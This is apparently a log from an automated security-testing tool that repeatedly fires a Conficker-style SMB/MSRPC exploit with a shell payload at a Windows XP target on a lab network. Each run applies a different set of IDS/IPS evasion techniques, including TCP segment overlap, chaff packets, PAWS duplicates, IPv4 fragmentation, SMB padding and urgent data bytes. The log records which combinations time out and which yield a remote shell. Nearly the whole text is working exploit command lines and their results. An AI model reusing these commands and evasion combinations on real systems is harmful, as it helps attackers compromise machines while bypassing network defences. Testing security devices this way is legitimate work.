- 6426 runs averaging 1.99 runs / second ; progress: 3229/43200...........
- 6437 runs averaging 1.99 runs / second ; progress: 3234/43200.....
- 6442 runs averaging 1.99 runs / second ; progress: 3239/43200..
- 6444 runs averaging 1.99 runs / second ; progress: 3244/43200.Pid 17583 timed out - killed
- 2015-06-08 00:13:38 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35275 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=123aANpGaM8 --evasion=[msrpc_req,end]tcp_overlap,"5","new","random_alphanum" --evasion=[netbios_connect,msrpc_req]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 123aANpGaM/
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - TCP segments are set to overlap by 5 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.115:35275 -> 10.35.1.207:445
- Terminated
- .
- 6447 runs averaging 1.98 runs / second ; progress: 3249/43200.Pid 17709 timed out - killed
- 2015-06-08 00:13:40 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17433 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=n87ySzclSe0 --evasion=[smb_opentree,smb_openpipe]netbios_chaff,"8","empty_unspec|empty_keepalive|msrpc_req|broken_length" --evasion=[msrpc_req,end]smb_decoytrees,"2","2","997","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed n87ySzclSe2
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - Before normal SMB writes, 2 SMB trees are opened and 2 writes are performed to them. The write payload is 997 random alphanumeric bytes.
- Info: NetBIOS connection 10.62.90.112:17433 -> 10.35.1.207:445
- Terminated
- .....
- 6454 runs averaging 1.98 runs / second ; progress: 3254/43200........
- 6462 runs averaging 1.98 runs / second ; progress: 3259/43200.....
- 6467 runs averaging 1.98 runs / second ; progress: 3264/43200........Pid 18131 timed out - killed
- 2015-06-08 00:13:58 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39853 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=AwsTHx1TWIM --evasion=[smb_connect,end]smb_writeandxpad,"8","zero" --evasion=[smb_openpipe,msrpc_req]tcp_chaff,"5","chksum|nullchksum|nullflag|outofwindow|shorthdr|longhdr","random_alpha" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed AwsTHx1TWIM
- The following evasions are applied from stage smb_connect to end:
- - 8 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - With every 5 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has random alpha bytes as payload
- - 25% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.119:39853 -> 10.35.1.207:445
- Terminated
- ....
- 6480 runs averaging 1.98 runs / second ; progress: 3269/43200.....
- 6485 runs averaging 1.98 runs / second ; progress: 3274/43200
- 6485 runs averaging 1.98 runs / second ; progress: 3279/43200..
- 6487 runs averaging 1.98 runs / second ; progress: 3284/43200...........
- 6498 runs averaging 1.98 runs / second ; progress: 3289/43200..............
- 6512 runs averaging 1.98 runs / second ; progress: 3294/43200...
- 6515 runs averaging 1.97 runs / second ; progress: 3299/43200
- 6515 runs averaging 1.97 runs / second ; progress: 3304/43200.....
- 6520 runs averaging 1.97 runs / second ; progress: 3309/43200...2015-06-08 00:14:42 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28413 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=roD2a76i9NE --evasion=[msrpc_bind,end]tcp_paws,"75%","268435453","zero" --evasion=[msrpc_bind,msrpc_req]tcp_seg,"4" --verifydelay=1000 --payload=shell
- Info: Using random seed roD2a76i9NG
- The following evasions are applied from stage msrpc_bind to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has 0x00 bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - TCP packets are segmented to contain at most 4 bytes of payload.
- Info: NetBIOS connection 10.62.90.112:28413 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 6527 runs averaging 1.97 runs / second ; progress: 3314/43200.2015-06-08 00:14:46 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22205 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=yAqSbF7a2AM --evasion=[msrpc_req,end]ipv4_frag,"24" --evasion=[start,end]tcp_paws,"3","8","random_alpha" --evasion=[smb_openpipe,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed yAqSbF7a2AP
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage msrpc_req to end:
- - IPv4 fragments with at most 24 bytes per fragment
- Info: NetBIOS connection 10.62.90.112:22205 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 6532 runs averaging 1.97 runs / second ; progress: 3319/43200....
- 6536 runs averaging 1.97 runs / second ; progress: 3324/43200.......
- 6543 runs averaging 1.97 runs / second ; progress: 3329/43200..
- 6545 runs averaging 1.96 runs / second ; progress: 3334/43200
- 6545 runs averaging 1.96 runs / second ; progress: 3339/43200
- 6545 runs averaging 1.96 runs / second ; progress: 3344/43200.
- 6546 runs averaging 1.95 runs / second ; progress: 3349/43200
- 6546 runs averaging 1.95 runs / second ; progress: 3354/43200Pid 19330 timed out - killed
- 2015-06-08 00:15:29 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53161 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=oMEwt4ZkuNY --evasion=[smb_connect,msrpc_bind]smb_chaff,"75%","write_flag","msrpc" --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"5","51454" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed oMEwt4ZkuNa
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 75% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - TCP packets are segmented to contain between 5 and 51454 bytes of payload.
- - 50% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.116:53161 -> 10.35.1.207:445
- Terminated
- 6547 runs averaging 1.95 runs / second ; progress: 3359/43200.........
- 6556 runs averaging 1.95 runs / second ; progress: 3364/43200..Pid 19484 timed out - killed
- 2015-06-08 00:15:36 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56602 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=RiI6C+8sOvQ --evasion=[start,msrpc_bind]ipv4_frag,"352" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed RiI6C+8sOvR
- The following evasions are applied from stage start to msrpc_bind:
- - IPv4 fragments with at most 352 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.113:56602 -> 10.35.1.207:445
- Terminated
- ..Pid 19507 timed out - killed
- 2015-06-08 00:15:37 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30669 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=uTRrvWQWLxA --evasion=[smb_opentree,msrpc_req]ipv4_frag,"312" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed uTRrvWQWLxC
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - IPv4 fragments with at most 312 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.114:30669 -> 10.35.1.207:445
- Terminated
- 2015-06-08 00:15:37 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25027 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=vYkbu33Qkdw --evasion=[smb_connect,end]netbios_chaff,"1","empty_keepalive|small_unspec|http_get|msrpc_req" --evasion=[smb_connect,end]tcp_paws,"2","8","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed vYkbu33Qkdy
- The following evasions are applied from stage smb_connect to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
- - Before every 1th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- Info: NetBIOS connection 10.62.90.113:25027 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ..........
- 6573 runs averaging 1.95 runs / second ; progress: 3370/43200........
- 6581 runs averaging 1.95 runs / second ; progress: 3375/43200
- 6581 runs averaging 1.95 runs / second ; progress: 3380/43200..
- 6583 runs averaging 1.94 runs / second ; progress: 3385/43200.......
- 6590 runs averaging 1.94 runs / second ; progress: 3390/43200.............
- 6603 runs averaging 1.95 runs / second ; progress: 3395/43200.......2015-06-08 00:16:09 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24268 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=PeJtMGJRh88 --evasion=[smb_openpipe,msrpc_req]ipv4_opt,"3","inc","shuffle" --evasion=[smb_connect,msrpc_bind]smb_writeandxpad,"6","zero" --evasion=[netbios_connect,end]tcp_paws,"1","145135867","random" --verifydelay=1000 --payload=shell
- Info: Using random seed PeJtMGJRh88
- The following evasions are applied from stage netbios_connect to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 145135867> and has random bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 6 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled payload
- Info: NetBIOS connection 10.62.90.113:24268 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..
- 6613 runs averaging 1.95 runs / second ; progress: 3400/43200..2015-06-08 00:16:11 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25887 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=fnJDHWfO8Io --evasion=[smb_connect,smb_openpipe]netbios_chaff,"25%","empty_unspec|empty_keepalive|msrpc_req" --evasion=[smb_openpipe,end]tcp_paws,"75%","88733991","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed fnJDHWfO8Ip
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - 25% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 88733991> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.114:25887 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .....
- 6621 runs averaging 1.94 runs / second ; progress: 3405/43200...
- 6624 runs averaging 1.94 runs / second ; progress: 3410/43200
- 6624 runs averaging 1.94 runs / second ; progress: 3415/43200......
- 6630 runs averaging 1.94 runs / second ; progress: 3420/43200..............
- 6644 runs averaging 1.94 runs / second ; progress: 3425/43200..............
- 6658 runs averaging 1.94 runs / second ; progress: 3430/43200............
- 6670 runs averaging 1.94 runs / second ; progress: 3435/43200....Pid 20341 timed out - killed
- 2015-06-08 00:16:47 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16556 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=RMgfaYyc57k --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed RMgfaYyc57l
- The following evasions are applied from stage smb_opentree to end:
- - Add a random alphaurgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.117:16556 -> 10.35.1.207:445
- Terminated
- .........
- 6684 runs averaging 1.94 runs / second ; progress: 3440/43200...........
- 6695 runs averaging 1.94 runs / second ; progress: 3445/43200.....2015-06-08 00:16:58 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38858 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=9ilraWnyxh4 --evasion=[smb_openpipe,msrpc_bind]tcp_paws,"25%","4","alphanumrandomized" --evasion=[msrpc_bind,end]tcp_paws,"1","4961990","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed 9ilraWnyxh7
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4961990> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.113:38858 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....
- 6705 runs averaging 1.94 runs / second ; progress: 3450/43200........
- 6713 runs averaging 1.94 runs / second ; progress: 3455/43200.........
- 6722 runs averaging 1.94 runs / second ; progress: 3460/43200..........
- 6732 runs averaging 1.94 runs / second ; progress: 3465/43200.....
- 6737 runs averaging 1.94 runs / second ; progress: 3470/43200...
- 6740 runs averaging 1.94 runs / second ; progress: 3475/43200.....
- 6745 runs averaging 1.94 runs / second ; progress: 3480/43200............
- 6757 runs averaging 1.94 runs / second ; progress: 3485/432002015-06-08 00:17:35 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29037 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=zoGhygQj2a0 --evasion=[smb_connect,msrpc_bind]ipv4_opt,"2","inc","shuffletcp" --evasion=[smb_openpipe,end]tcp_paws,"50%","33475370","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed zoGhygQj2a3
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- The following evasions are applied from stage smb_openpipe to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 33475370> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.114:29037 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 6764 runs averaging 1.94 runs / second ; progress: 3490/43200....
- 6768 runs averaging 1.94 runs / second ; progress: 3495/43200.......
- 6775 runs averaging 1.94 runs / second ; progress: 3500/43200........
- 6783 runs averaging 1.94 runs / second ; progress: 3505/43200.
- 6784 runs averaging 1.93 runs / second ; progress: 3510/43200
- 6784 runs averaging 1.93 runs / second ; progress: 3515/43200
- 6784 runs averaging 1.93 runs / second ; progress: 3520/43200....
- 6788 runs averaging 1.93 runs / second ; progress: 3525/43200.....
- 6793 runs averaging 1.92 runs / second ; progress: 3530/43200..Pid 21204 timed out - killed
- 2015-06-08 00:18:21 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33089 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=BaIgcwZW4VQ --evasion=[start,netbios_connect]tcp_chaff,"2","nullchksum|nullflag|longhdr","unmodified" --evasion=[netbios_connect,msrpc_bind]tcp_overlap,"1478","new","random" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed BaIgcwZW4VQ
- The following evasions are applied from stage start to netbios_connect:
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - TCP segments are set to overlap by 1478 bytes, with the later packet containing the correct payload. Overlapping part has random bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.118:33089 -> 10.35.1.207:445
- Terminated
- ........
- 6804 runs averaging 1.92 runs / second ; progress: 3535/43200.....
- 6809 runs averaging 1.92 runs / second ; progress: 3540/43200......
- 6815 runs averaging 1.92 runs / second ; progress: 3545/43200......
- 6821 runs averaging 1.92 runs / second ; progress: 3550/43200.........
- 6830 runs averaging 1.92 runs / second ; progress: 3555/43200Pid 21497 timed out - killed
- 2015-06-08 00:18:45 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62671 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=o7JIQ5gkSRo --evasion=[msrpc_bind,end]ipv4_frag,"56" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed o7JIQ5gkSRq
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random alphaurgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - IPv4 fragments with at most 56 bytes per fragment
- Info: NetBIOS connection 10.62.90.115:62671 -> 10.35.1.207:445
- Terminated
- .....
- 6836 runs averaging 1.92 runs / second ; progress: 3560/43200.......
- 6843 runs averaging 1.92 runs / second ; progress: 3565/43200Pid 21595 timed out - killed
- 2015-06-08 00:18:55 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13471 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=xLQU+B0/gW8 --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"1","3","8","random" --evasion=[msrpc_bind,end]smb_seg,"4" --evasion=[smb_opentree,end]tcp_paws,"2","2","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed xLQU+B0/gW/
- The following evasions are applied from stage smb_opentree to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Before normal SMB writes, 1 SMB trees are opened and 3 writes are performed to them. The write payload is 8 random bytes.
- The following evasions are applied from stage msrpc_bind to end:
- - SMB writes are segmented to contain at most 4 bytes of payload.
- Info: NetBIOS connection 10.62.90.110:13471 -> 10.35.1.207:445
- Terminated
- ............
- 6856 runs averaging 1.92 runs / second ; progress: 3570/43200..................
- 6874 runs averaging 1.92 runs / second ; progress: 3575/43200.....
- 6879 runs averaging 1.92 runs / second ; progress: 3581/43200.
- 6880 runs averaging 1.92 runs / second ; progress: 3586/43200.....
- 6885 runs averaging 1.92 runs / second ; progress: 3591/43200.........2015-06-08 00:19:24 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22534 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=E1WN1gofr4c --evasion=[start,netbios_connect]tcp_paws,"25%","2","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","5","alpharandomized" --evasion=[netbios_connect,smb_connect]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed E1WN1gofr4c
- The following evasions are applied from stage start to netbios_connect:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage netbios_connect to smb_connect:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.116:22534 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 6895 runs averaging 1.92 runs / second ; progress: 3596/43200..Pid 22023 timed out - killed
- 2015-06-08 00:19:27 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=27003 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=EpXCyMOuFpI --evasion=[msrpc_bind,end]smb_seg,"6" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed EpXCyMOuFpI
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a zero urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - SMB writes are segmented to contain at most 6 bytes of payload.
- Info: NetBIOS connection 10.62.90.111:27003 -> 10.35.1.207:445
- Terminated
- .............
- 6911 runs averaging 1.92 runs / second ; progress: 3601/43200.................
- 6928 runs averaging 1.92 runs / second ; progress: 3606/43200.............
- 6941 runs averaging 1.92 runs / second ; progress: 3611/43200...........
- 6952 runs averaging 1.92 runs / second ; progress: 3616/43200.............
- 6965 runs averaging 1.92 runs / second ; progress: 3621/43200.......2015-06-08 00:19:54 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16614 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=or/a1zhDenU --evasion=[netbios_connect,smb_connect]ipv4_opt,"8","inc","unmodified" --evasion=[smb_openpipe,end]tcp_paws,"2","8","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed or/a1zhDenW
- The following evasions are applied from stage netbios_connect to smb_connect:
- - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload
- The following evasions are applied from stage smb_openpipe to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.118:16614 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..
- 6975 runs averaging 1.92 runs / second ; progress: 3626/43200....Pid 22296 timed out - killed
- 2015-06-08 00:19:58 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18149 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=7rGocRK0Uq8 --evasion=[smb_connect,msrpc_req]smb_writeandxpad,"1022","zero" --evasion=[smb_connect,msrpc_req]tcp_segvar,"5","65533" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 7rGocRK0Uq/
- The following evasions are applied from stage smb_connect to msrpc_req:
- - TCP packets are segmented to contain between 5 and 65533 bytes of payload.
- - 1022 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.112:18149 -> 10.35.1.207:445
- Terminated
- .....
- 6985 runs averaging 1.92 runs / second ; progress: 3631/43200.........
- 6994 runs averaging 1.92 runs / second ; progress: 3636/43200..
- 6996 runs averaging 1.92 runs / second ; progress: 3641/43200.....
- 7001 runs averaging 1.92 runs / second ; progress: 3646/432002015-06-08 00:20:17 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51373 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=x4ty6ZS0nOg --evasion=[netbios_connect,smb_opentree]tcp_paws,"5","245151688","zero" --evasion=[smb_openpipe,end]tcp_paws,"75%","268435454","alphanumrandomized" --verifydelay=1000 --payload=shell
